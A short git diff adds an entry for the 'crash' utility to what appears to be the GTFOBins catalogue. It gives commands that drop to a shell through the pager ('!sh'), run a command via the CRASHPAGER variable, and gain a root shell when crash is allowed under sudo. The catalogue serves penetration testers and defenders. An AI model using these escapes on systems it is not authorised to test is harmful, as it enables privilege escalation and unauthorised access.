diff --git a/_gtfobins/crash.md b/_gtfobins/crash.md new file mode 100644 index 0000000..e16622c --- /dev/null +++ b/_gtfobins/crash.md @@ -0,0 +1,17 @@ +--- +functions: + shell: + - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. + code: | + crash -h + !sh + command: + - code: | + COMMAND='/usr/bin/id' + CRASHPAGER="$COMMAND" crash -h + sudo: + - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. + code: | + sudo crash -h + !sh +---